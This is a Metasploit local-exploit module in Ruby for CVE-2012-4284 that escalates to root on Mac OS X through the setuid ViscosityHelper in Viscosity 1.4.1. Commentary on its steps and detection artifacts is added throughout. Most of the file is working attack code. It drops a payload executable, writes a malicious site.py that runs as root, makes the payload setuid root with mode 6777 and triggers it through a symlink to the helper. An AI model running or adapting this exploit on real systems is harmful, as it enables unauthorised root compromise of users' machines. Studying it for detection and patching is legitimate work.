##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation against the setuid-root ViscosityHelper shipped
# with Viscosity 1.4.1 on Mac OS X (CVE-2012-4284, see 'References').
#
# Flow as implemented below: a payload binary, a site.py and a symlink to the
# helper are dropped into WritableDir, then the symlink is executed. The module
# description states only that path-name validation in the helper is
# insufficient; presumably the helper's Python picks up the dropped site.py
# when invoked through the symlink — confirm against the referenced advisory.
#
# Artifacts left on the target (relevant for detection and cleanup): the
# symlink to ViscosityHelper, site.py and any site.pyc next to it, and the
# payload executable, which the Python snippet re-owns to root with mode 6777.
# Nothing is removed on success (see the print_warning at the end of #exploit).
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::OSX::Priv
  include Msf::Post::File
  include Msf::Exploit::EXE

  # Module metadata and options.
  #
  # @param info [Hash] module information merged via update_info
  def initialize(info = {})
    super( update_info( info, {
      'Name' => 'Viscosity setuid-set ViscosityHelper Privilege Escalation',
      'Description' => %q{
        This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The
        vulnerability exists in the setuid ViscosityHelper, where an insufficient
        validation of path names allows execution of arbitrary python code as root.
        This module has been tested successfully on Viscosity 1.4.1 over Mac OS X
        10.7.5.
      },
      'References' =>
        [
          [ 'CVE', '2012-4284' ],
          [ 'OSVDB', '84709' ],
          [ 'EDB', '20485' ],
          [ 'URL', 'http://blog.zx2c4.com/791' ]
        ],
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Jason A. Donenfeld', # Vulnerability discovery and original Exploit
          'juan vazquez' # Metasploit module
        ],
      'DisclosureDate' => '2012-08-12',
      'Platform' => 'osx',
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes' => [ 'shell' ],
      # Two targets differing only in payload architecture; both run the same code path.
      'Targets' =>
        [
          [ 'Viscosity 1.4.1 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],
          [ 'Viscosity 1.4.1 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]
        ],
      # PrependSetresuid: the generated payload is prefixed with a setresuid stub
      # (presumably so the session runs as root once the setuid binary execs);
      # WfsDelay: the handler waits 2 seconds for the session.
      'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
      'DefaultTarget' => 0
    }))
    register_options [
      # These are not OptPath because it's a *remote* path
      OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
      OptString.new("Viscosity", [ true, "Path to setuid ViscosityHelper executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ])
    ]
  end

  # Remote directory that receives all dropped files (the WritableDir option).
  #
  # @return [String] the option value coerced to a String
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Checks for a setuid-root ViscosityHelper at the configured path.
  #
  # Only existence, root ownership and the setuid bit (find -perm -4000) are
  # verified; the Viscosity version is not checked, so a setuid helper from a
  # fixed release would also be reported as Vulnerable.
  #
  # NOTE(review): the local variable `check` shadows this method's name, and
  # the Viscosity path is interpolated into the shell command unquoted, so a
  # path containing spaces would not be matched.
  #
  # @return [Msf::Exploit::CheckCode] Safe or Vulnerable
  def check
    unless file? datastore['Viscosity']
      vprint_error 'ViscosityHelper not found'
      return CheckCode::Safe
    end

    check = cmd_exec("find #{datastore["Viscosity"]} -type f -user root -perm -4000")

    unless check.include? 'ViscosityHelper'
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  # Removes the files dropped by #exploit: the symlink, site.py, a site.pyc
  # next to it (presumably byte-compiled by the helper's Python when site.py is
  # imported — not created by this module) and the payload executable.
  # Assumes #exploit has already set @link, @python_file and @exe_file.
  def clean
    file_rm(@link)
    file_rm(@python_file)
    file_rm("#{@python_file}c")
    file_rm(@exe_file)
  end

  # Runs the exploit. The steps are order-dependent: the payload and site.py
  # must exist before the symlink is executed.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the session is already
  #   root, the target is not vulnerable, or WritableDir is not writable
  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # 1. Drop the payload executable under a random 8-letter name.
    exe_name = rand_text_alpha(8)
    @exe_file = "#{base_dir}/#{exe_name}"
    print_status("Dropping executable #{@exe_file}")
    write_file(@exe_file, generate_payload_exe)

    # 2. Python that runs as root: re-own the dropped payload to root, make it
    #    setuid/setgid (mode 6777) and exec it. The <<- heredoc keeps the
    #    content unindented so Python does not see a leading indent.
    evil_python =<<-EOF
import os
os.setuid(0)
os.setgid(0)
os.system("chown root #{@exe_file}")
os.system("chmod 6777 #{@exe_file}")
os.execl("#{@exe_file}", "#{exe_name}")
    EOF

    # 3. The file name is fixed to site.py; the module relies on the helper's
    #    Python importing it from this directory (see class comment).
    @python_file = "#{base_dir}/site.py"
    print_status("Dropping python #{@python_file}...")
    write_file(@python_file, evil_python)

    # 4. Symlink the setuid helper into the same directory (ln -f overwrites
    #    an existing link of that name).
    print_status("Creating symlink...")
    link_name = rand_text_alpha(8)
    @link = "#{base_dir}/#{link_name}"
    cmd_exec "ln -s -f -v #{datastore["Viscosity"]} #{@link}"

    # 5. Execute the helper through the symlink.
    print_status("Running...")
    begin
      cmd_exec "#{@link}"
    rescue
      # Bare rescue: only a StandardError raised by cmd_exec reaches here;
      # a helper that runs but exits non-zero is not detected — TODO confirm
      # cmd_exec's failure semantics.
      print_error("Failed. Cleaning files #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}...")
      clean
      return
    end
    # On success the dropped files are deliberately left in place.
    print_warning("Remember to clean files: #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}")
  end
end